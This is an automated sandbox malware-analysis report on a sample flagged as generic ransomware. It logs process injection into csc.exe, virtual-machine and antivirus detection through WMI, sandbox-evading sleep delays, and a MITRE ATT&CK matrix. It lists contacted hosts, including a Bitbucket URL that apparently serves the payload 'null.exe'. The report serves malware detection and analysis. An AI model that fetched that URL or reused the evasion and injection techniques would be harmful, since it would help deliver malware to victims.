Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Memory allocated: 7070000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Memory allocated: 73E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Memory allocated: 7070000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 514000			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Window / User API: threadDelayed 4985			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Window / User API: threadDelayed 4803			Jump to behavior

Source: C:\Users\user\Desktop\hoTwj68T1D.exe

Dropped PE file which has not been started: C:\Users\user\Documents\PerfectBlues\Bin\PerfectBlues.exe

Jump to dropped file

Source: C:\Users\user\Desktop\hoTwj68T1D.exe

API coverage: 0.3 %

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 1656	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 1656	Thread sleep time: -31359464925306218s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 1656	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 1616	Thread sleep count: 4985 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 1656	Thread sleep time: -59875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 1656	Thread sleep time: -59765s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 1616	Thread sleep count: 4803 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 1656	Thread sleep time: -59656s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 1656	Thread sleep time: -59547s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 1656	Thread sleep time: -59433s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 1656	Thread sleep time: -59313s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 1656	Thread sleep time: -59163s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 1656	Thread sleep time: -59044s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 1656	Thread sleep time: -58918s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 1656	Thread sleep time: -58794s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 1656	Thread sleep time: -58688s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 1656	Thread sleep time: -58578s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 1656	Thread sleep time: -58469s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 1656	Thread sleep time: -58359s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 1656	Thread sleep time: -58250s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 1656	Thread sleep time: -58095s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 1656	Thread sleep time: -57969s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 1656	Thread sleep time: -57859s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 1656	Thread sleep time: -57750s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 1656	Thread sleep time: -57635s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 1656	Thread sleep time: -57516s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 1656	Thread sleep time: -57391s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 1656	Thread sleep time: -57266s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 1656	Thread sleep time: -57153s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 1656	Thread sleep time: -57043s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 1656	Thread sleep time: -56922s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 1656	Thread sleep time: -56809s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 1656	Thread sleep time: -56700s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 1656	Thread sleep time: -56516s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 1656	Thread sleep time: -55901s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 1656	Thread sleep time: -55762s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 1656	Thread sleep time: -55641s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 1656	Thread sleep time: -55531s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 1656	Thread sleep time: -55418s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 1656	Thread sleep time: -55297s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 1656	Thread sleep time: -55168s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 796	Thread sleep time: -514000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 1656	Thread sleep time: -59766s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 1656	Thread sleep time: -59641s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 1656	Thread sleep time: -59516s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 1656	Thread sleep time: -59407s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 1656	Thread sleep time: -59282s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 1656	Thread sleep time: -59141s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 1656	Thread sleep time: -59030s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 1656	Thread sleep time: -58922s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 1656	Thread sleep time: -58541s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 1656	Thread sleep time: -58435s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 1656	Thread sleep time: -58313s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 1656	Thread sleep time: -58204s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 1656	Thread sleep time: -58091s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_004063C8 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,	1_2_004063C8
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_004064A4 FindFirstFileA,GetLastError,	1_2_004064A4
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: 1_2_00404F2A FindFirstFileA,	1_2_00404F2A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 59875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 59765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 59656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 59547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 59433	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 59313	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 59163	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 59044	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 58918	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 58794	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 58688	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 58578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 58469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 58359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 58250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 58095	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 57969	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 57859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 57750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 57635	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 57516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 57391	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 57266	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 57153	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 57043	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 56922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 56809	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 56700	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 56516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 55901	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 55762	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 55641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 55531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 55418	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 55297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 55168	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 514000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 59766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 59641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 59516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 59407	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 59282	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 59141	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 59030	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 58922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 58541	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 58435	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 58313	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 58204	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread delayed: delay time: 58091	Jump to behavior

Source: csc.exe, 00000003.00000002.4660910077.0000000009F30000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllrialssf

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Code function: 3_2_09CE26F8 LdrInitializeThunk,

3_2_09CE26F8

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\hoTwj68T1D.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\hoTwj68T1D.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: E30000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\hoTwj68T1D.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: E30000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: E30000			Jump to behavior
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: CE7008			Jump to behavior

Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: GetLocaleInfoA,		1_2_0040787C
Source: C:\Users\user\Desktop\hoTwj68T1D.exe	Code function: GetLocaleInfoA,		1_2_004078C8

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\hoTwj68T1D.exe

Code function: 1_2_004082FC GetVersionExA,

1_2_004082FC

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	131 Windows Management Instrumentation	1 Scheduled Task/Job	31 Process Injection	1 Masquerading	11 Input Capture	121 Security Software Discovery	Remote Services	11 Input Capture	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	11 Disable or Modify Tools	LSASS Memory	141 Virtualization/Sandbox Evasion	Remote Desktop Protocol	11 Archive Collected Data	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 DLL Side-Loading	1 Registry Run Keys / Startup Folder	141 Virtualization/Sandbox Evasion	Security Account Manager	11 Application Window Discovery	SMB/Windows Admin Shares	3 Clipboard Data	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	31 Process Injection	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Deobfuscate/Decode Files or Information	LSA Secrets	134 System Information Discovery	SSH	Keylogging	3 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Obfuscated Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	3 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
hoTwj68T1D.exe	58%	ReversingLabs	Win32.Ransomware.Generic

Name	IP	Active	Malicious	Antivirus Detection	Reputation
bitbucket.org	185.166.143.49	true	false		high
navegacionseguracol24vip.org	181.131.217.244	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://bitbucket.org/facturacioncol/fact/downloads/null.exe	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net	csc.exe, 00000003.00000002.4658171446.00000000076FC000.00000004.00000800.00020000.00000000.sdmp	false	high
https://sectigo.com/CPS0	hoTwj68T1D.exe, PerfectBlues.exe.1.dr	false	high
https://stackoverflow.com/q/14436606/23354	csc.exe, 00000003.00000003.2441546726.000000000885E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4660568306.0000000009C80000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000002.4658171446.00000000073E1000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2441546726.0000000008995000.00000004.00000800.00020000.00000000.sdmp	false	high
https://github.com/mgravell/protobuf-netJ	csc.exe, 00000003.00000003.2441546726.000000000885E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4660568306.0000000009C80000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2441546726.0000000008995000.00000004.00000800.00020000.00000000.sdmp	false	high
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	hoTwj68T1D.exe, PerfectBlues.exe.1.dr	false	high
http://ocsp.sectigo.com0	hoTwj68T1D.exe, PerfectBlues.exe.1.dr	false	high
http://bitbucket.org	csc.exe, 00000003.00000002.4658171446.00000000076DC000.00000004.00000800.00020000.00000000.sdmp	false	high
https://web-security-reports.services.atlassian.com/csp-report/bb-website	csc.exe, 00000003.00000002.4658171446.00000000076F8000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4658171446.00000000076DC000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4658171446.00000000076FC000.00000004.00000800.00020000.00000000.sdmp	false	high
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#	hoTwj68T1D.exe, PerfectBlues.exe.1.dr	false	high
https://github.com/mgravell/protobuf-net	csc.exe, 00000003.00000003.2441546726.000000000885E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4660568306.0000000009C80000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2441546726.0000000008995000.00000004.00000800.00020000.00000000.sdmp	false	high
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/	csc.exe, 00000003.00000002.4658171446.00000000076FC000.00000004.00000800.00020000.00000000.sdmp	false	high
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	hoTwj68T1D.exe, PerfectBlues.exe.1.dr	false	high
https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/	csc.exe, 00000003.00000002.4658171446.00000000076FC000.00000004.00000800.00020000.00000000.sdmp	false	high
https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net	csc.exe, 00000003.00000002.4658171446.00000000076FC000.00000004.00000800.00020000.00000000.sdmp	false	high
https://dz8aopenkvv6s.cloudfront.net	csc.exe, 00000003.00000002.4658171446.00000000076F8000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4658171446.00000000076DC000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4658171446.00000000076FC000.00000004.00000800.00020000.00000000.sdmp	false	high
https://github.com/mgravell/protobuf-neti	csc.exe, 00000003.00000003.2441546726.000000000885E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4660568306.0000000009C80000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2441546726.0000000008995000.00000004.00000800.00020000.00000000.sdmp	false	high
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y	hoTwj68T1D.exe, PerfectBlues.exe.1.dr	false	high
https://remote-app-switcher.prod-east.frontend.public.atl-paas.net	csc.exe, 00000003.00000002.4658171446.00000000076F8000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4658171446.00000000076DC000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4658171446.00000000076FC000.00000004.00000800.00020000.00000000.sdmp	false	high
https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net	csc.exe, 00000003.00000002.4658171446.00000000076FC000.00000004.00000800.00020000.00000000.sdmp	false	high
https://stackoverflow.com/q/11564914/23354;	csc.exe, 00000003.00000003.2441546726.000000000885E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4660568306.0000000009C80000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2441546726.0000000008995000.00000004.00000800.00020000.00000000.sdmp	false	high
https://stackoverflow.com/q/2152978/23354	csc.exe, 00000003.00000003.2441546726.000000000885E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4660568306.0000000009C80000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2441546726.0000000008995000.00000004.00000800.00020000.00000000.sdmp	false	high
https://cdn.cookielaw.org/	csc.exe, 00000003.00000002.4658171446.00000000076F8000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4658171446.00000000076FC000.00000004.00000800.00020000.00000000.sdmp	false	high
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;	csc.exe, 00000003.00000002.4658171446.00000000076FC000.00000004.00000800.00020000.00000000.sdmp	false	high
https://aui-cdn.atlassian.com/	csc.exe, 00000003.00000002.4658171446.00000000076F8000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4658171446.00000000076FC000.00000004.00000800.00020000.00000000.sdmp	false	high
